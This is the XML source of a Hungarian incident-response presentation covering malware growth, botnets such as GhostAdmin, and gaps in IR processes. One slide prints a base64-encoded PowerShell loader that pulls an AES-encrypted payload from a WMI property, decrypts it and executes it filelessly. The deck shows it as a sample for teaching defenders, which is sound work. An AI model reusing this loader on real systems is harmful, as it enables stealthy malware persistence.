              <a:t> ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoACQAJACQAYwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACQAbQBzACwAIAAkAGMAcgBUAHIALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAE0AbwBkAGUAXQA6ADoAVwByAGkAdABlACkADQAKAAkACQAkAGMAcwAuAFcAcgBpAHQAZQAoACQAZABhAHQAYQAsACAAMAAsACAAJABkAGEAdABhAC4ATABlAG4AZwB0AGgAKQANAAoACQAJACQAYwBzAC4ARgBsAHUAcwBoAEYAaQBuAGEAbABCAGwAbwBjAGsAKAApAA0ACgAJAAkAJAByAGUAdAAgAD0AIAAkAG0AcwAuAFQAbwBBAHIAcgBhAHkAKAApAA0ACgAJAAkAJABjAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAAkAJABtAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAGUAYwByAEEAZQBzACgAJABlAG4AYwBEAGEAdABhACwAIAAkAGsAZQB5ACwAIAAkAGkAdgApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHAAcgBvAHYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAANAAoACQAJACQAcAByAG8AdgAuAEsAZQB5ACAAPQAgACQAawBlAHkADQAKAAkACQAkAHAAcgBvAHYALgBJAFYAIAA9ACAAJABpAHYADQAKAAkACQAkAGQAZQBjAHIAIAA9ACAAJABwAHIAbwB2AC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkAHAAcgBvAHYALgBLAGUAeQAsACAAJABwAHIAbwB2AC4ASQBWACkADQAKAAkACQAkAHIAZQB0ACAAPQAgAHAAZQByAGYAQwByACAAJABkAGUAYwByACAAJABlAG4AYwBEAGEAdABhAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAFcAUAAoACQAYwBOACwAIAAkAHAATgAsACAAJABhAEsALAAgACQAYQBJACkADQAKAHsADQAKAAkAaQBmACgAJABjAE4AIAAtAGUAcQAgACQAbgB1AGwAbAAgAC0AbwByACAAJABwAE4AIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAcgBlAHQAdQByAG4AIAAkAGYAYQBsAHMAZQB9AA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHcAcAAgAD0AIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJABjAE4AKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAkAHAATgBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAJABlAHgARQBuACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AHAAKQANAAoACQAJACQAZQB4AEQAZQBjACAAPQAgAGQAZQBjAHIAQQBlAHMAIAAkAGUAeABFAG4AIAAkAGEASwAgACQAYQBJAA0ACgAJAAkAJABlAHgAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZQB4AEQAZQBjACkADQAKAAkACQBpAGYAKAAkAGUAeAAgAC0AZQBxACAAJABuAHUAbABsACAALQBvAHIAIAAkAGUAeAAgAC0AZQBxACAAJwAnACkADQAKAAkACQB7AHIAZQB0AHUAcgBuAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGUAeAANAAoACQAJAHIAZQB0AHUAcgBuACAAJAB0AHIAdQBlAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsADQAKAAkACQByAGUAdAB1AHIAbgAgACQAZgBhAGwAcwBlAA0ACgAJAH0ADQAKAH0ADQAKAA0ACgAkAGEAZQBLACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGUANwAsACAAMAB4AGQANgAsACAAMAB4AGIAZQAsACAAMAB4AGEAOQAsACAAMAB4AGIANwAsACAAMAB4AGUANgAsACAAMAB4ADUANQAsACAAMAB4ADMAYQAsACAAMAB4AGUAZQAsACAAMAB4ADEANgAsACAAMAB4ADcAOQAsACAAMAB4AGMAYQAsACAAMAB4ADUANgAsACAAMAB4ADAAZgAsACAAMAB4AGIAYwAsACAAMAB4ADMAZgAsACAAMAB4ADIAMgAsACAAMAB4AGUAZAAsACAAMAB4AGYAZgAsACAAMAB4ADAAMgAsACAAMAB4ADQAMwAsACAAMAB4ADQAYwAsACAAMAB4ADEAYgAsACAAMAB4AGMAMAAsACAAMAB4AGUANwAsACAAMAB4ADUANwAsACAAMAB4AGIAMgAsACAAMAB4AGMAYgAsACAAMAB4AGQAOAAsACAAMAB4AGMAZQAsACAAMAB4AGQAYQAsACAAMAB4ADAAMAApAA0ACgAkAGEAZQBJACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGIAZQAsACAAMAB4ADcAYQAsACAAMAB4ADkAMAAsACAAMAB4AGQAOQAsACAAMAB4AGQANQAsACAAMAB4AGYANwAsACAAMAB4AGEAYQAsACAAMAB4ADYAZAAsACAAMAB4AGUAOQAsACAAMAB4ADEANgAsACAAMAB4ADYANAAsACAAMAB4ADEAZAAsACAAMAB4ADkANwAsACAAMAB4ADEANgAsACAAMAB4AGMAMAAsACAAMAB4ADYANwApAA0ACgBzAFcAUAAgACcAVwBtAGkAJwAgACcAVwBtAGkAJwAgACQAYQBlAEsAIAAkAGEAZQBJACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier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74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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>AZ „IOC” HALOTT...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>STIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Domain Objects (SDO)</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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9999" y="1639949"/>
            <a:ext cx="8029621" cy="400551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5527" y="1639949"/>
            <a:ext cx="3766299" cy="4005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539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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>EGY JÓ MALWARE HENTES KELLENE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A KÓROKOZÓK ÖSSZETETTSÉGE</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin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709410" y="1992793"/>
            <a:ext cx="4422416" cy="312085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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MEGLEHETŐSEN SOK VAN BELŐLE (ÉVI 20% NÖVEKEDÉS)</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RUGALMAS ARCHITEKTÚRA</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NAGY PARANCSKÉSZLET</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MEGFIGYELÉS ELKERÜLŐ MECHANIZMUSOK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EGYSZERŰSÖDIK A FELADAT (TÁMOGATOTT ROOTKIT-EK) </a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean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070" y="1906270"/>
            <a:ext cx="6319880" cy="308306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3757" y="4267185"/>
            <a:ext cx="2695653" cy="1794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575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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8081010" y="294041"/>
            <a:ext cx="3050816" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>GHOSTADMIN IRC PARANCS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>LISTA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EGY AKTUÁLIS FEJLETT BOTNET PÉLDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CrimeScene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tovább fejlesztés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)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49" y="294041"/>
            <a:ext cx="7587560" cy="542095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9867" y="4333461"/>
            <a:ext cx="3616008" cy="2034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29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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294040"/>
            <a:ext cx="2726101" cy="4357970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>AZ ALAPVETŐ KÉPESSÉGEK HIÁNYA IS GOND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>„SAG MIR, WO DIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MALWARE-LABOREN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SIND?”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3245" y="294041"/>
            <a:ext cx="8288830" cy="6057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7680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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr algn="l" defTabSz="57626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  <a:ea typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="4572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6pPr>
            <a:lvl7pPr marL="9144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7pPr>
            <a:lvl8pPr marL="13716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8pPr>
            <a:lvl9pPr marL="1828800" algn="l" defTabSz="57626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hu-HU" dirty="0" smtClean="0"/>
              <a:t>REAGÁLJUNK... DE HOGYAN?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A TUDÁSUNK PRÓBÁJA</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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59999" y="2438436"/>
            <a:ext cx="5385913" cy="20867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buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>„NEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SOK CÉGNÉL FEDEZHETŐ FEL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MÉG AZ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INCIDENT RESPONSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) FOLYAMAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...”</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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5475402" y="1737359"/>
            <a:ext cx="5451679" cy="4330610"/>
            <a:chOff x="5475402" y="1737359"/>
            <a:chExt cx="5451679" cy="4330610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 rotWithShape="1">
            <a:blip r:embed="rId7"/>
            <a:srcRect l="10629" t="14412" r="22191" b="3750"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6206491" y="1737359"/>
              <a:ext cx="4720590" cy="3927977"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5475402" y="5643237"/>
              <a:ext cx="5451679" cy="4247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>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" sz="2400" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="232627"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>KEVIN MANDIA – BLACKHAT, 2004</a:t>
              </a:r>
              <a:endParaRPr lang="hu-HU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627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205609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5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rm_hCMpk.V4ND6ZZem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592S_uvUGiHdQZRInqW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XB.U3WeEiu7UzsSJ27K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I_oaHZqk289dUG2fBE4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592S_uvUGiHdQZRInqW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XB.U3WeEiu7UzsSJ27K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I_oaHZqk289dUG2fBE4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592S_uvUGiHdQZRInqW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XB.U3WeEiu7UzsSJ27K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I_oaHZqk289dUG2fBE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592S_uvUGiHdQZRInqW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XB.U3WeEiu7UzsSJ27K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I_oaHZqk289dUG2fBE4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4gjeqWg0ygQO4H4f3Fw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mAmJDYT0K147Oj4kK0n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jBzsR6wkO3_WKRStDQO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34KX3KcEqCrstXiOfD1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.TmT8Vf0epfXzv_nQaH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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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fO06LMTEOmzET9q5OyG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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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592S_uvUGiHdQZRInqW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34KX3KcEqCrstXiOfD1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34KX3KcEqCrstXiOfD1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WNxVKSAUOOCEtKdFlR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XB.U3WeEiu7UzsSJ27K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I_oaHZqk289dUG2fBE4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4gjeqWg0ygQO4H4f3Fw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SY_PPT_Master_16_9_E">
  <a:themeElements>
    <a:clrScheme name="TELEKOM_Master_DE_RC6 Kopie 2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BB259582B40114C826AECD9CB9F09BA" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="dd4281a4cf6156008b84dfbaccbd35a6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5B580B02-63E2-4DE3-AE1C-35D6C4719BB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11D7DCD-AADD-4D81-AFFB-A237DCB5930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SY_PPT_Master_16_9_E</Template>
  <TotalTime>3678</TotalTime>
  <Words>579</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>121</Paragraphs>
  <Slides>15</Slides>
  <Notes>15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6" baseType="lpstr">
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Intel Clear</vt:lpstr>
      <vt:lpstr>Tele-GroteskEEUlt</vt:lpstr>
      <vt:lpstr>Tele-GroteskFet</vt:lpstr>
      <vt:lpstr>Tele-GroteskNor</vt:lpstr>
      <vt:lpstr>Tele-GroteskUlt</vt:lpstr>
      <vt:lpstr>TeleGrotesk Headline</vt:lpstr>
      <vt:lpstr>TeleGrotesk Headline Ultra</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>TSY_PPT_Master_16_9_E</vt:lpstr>
      <vt:lpstr>MI KELL EGY MODERN INCIDENS SIKERES KEZELÉSÉHEZ? A "TIK-TAK" elv.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Köszönöm a  Figyelmet! Keleti.arthur@t-systems.hu </vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>KFKI Zrt.</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>15.003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LEGROTESK ULTRA TELEGROTESK REGULAR IN  24, 28, 32, 36, 40, 44, 48, 54, 60, 66 PT</dc:title>
  <dc:creator>nagyildiko</dc:creator>
  <cp:lastModifiedBy>Arthur Keleti</cp:lastModifiedBy>
  <cp:revision>159</cp:revision>
  <cp:lastPrinted>2012-09-04T09:22:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-03-25T08:45:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-25T14:18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TAG2">
    <vt:lpwstr>000800e6170000000000010250600207f980073804f000</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_AdHocReviewCycleID">
    <vt:i4>261050032</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_NewReviewCycle">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_EmailSubject">
    <vt:lpwstr>IDC IoT eloadas</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_AuthorEmail">
    <vt:lpwstr>varga3.tibor@t-systems.hu</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="_AuthorEmailDisplayName">
    <vt:lpwstr>Varga3 Tibor</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="_PreviousAdHocReviewCycleID">
    <vt:i4>-1603907615</vt:i4>
  </property>
</Properties>
</file>